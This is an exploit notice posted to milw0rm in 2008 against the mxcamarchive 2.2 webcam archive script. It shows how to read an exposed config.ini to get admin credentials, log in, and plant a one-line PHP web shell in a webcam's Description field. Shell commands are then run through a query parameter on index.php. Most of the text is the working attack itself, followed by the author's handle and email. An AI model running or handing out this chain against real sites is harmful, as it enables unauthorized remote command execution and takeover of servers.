36 lines
No EOL
914 B
Text
36 lines
No EOL
914 B
Text
************************(Bypass Config Download Vulnerability)*****************
|
|
|
|
script: mxcamarchive 2.2
|
|
|
|
***************************************************************************
|
|
download from:http://www.infireal.com/media/serve/106/mxcamarchive2.2.zip
|
|
|
|
***************************************************************************
|
|
...........................................................................
|
|
expl:
|
|
|
|
http://site.com/path/archive/config.ini
|
|
|
|
and login
|
|
http://site.com/path/admin
|
|
|
|
|
|
and add new web cam
|
|
and Description '<pre><?@system($_REQUEST["h"]);?></body></pre>'
|
|
and save
|
|
|
|
|
|
now:
|
|
http://site.com/path/index.php?h=ls -la
|
|
|
|
***************************************************
|
|
***************************************************
|
|
|
|
Author: ahmadbady from http://www.deltahacking.net
|
|
|
|
my mail: kivi_hacker666@yahoo.com
|
|
|
|
|
|
***************************************************
|
|
|
|
# milw0rm.com [2008-11-17] |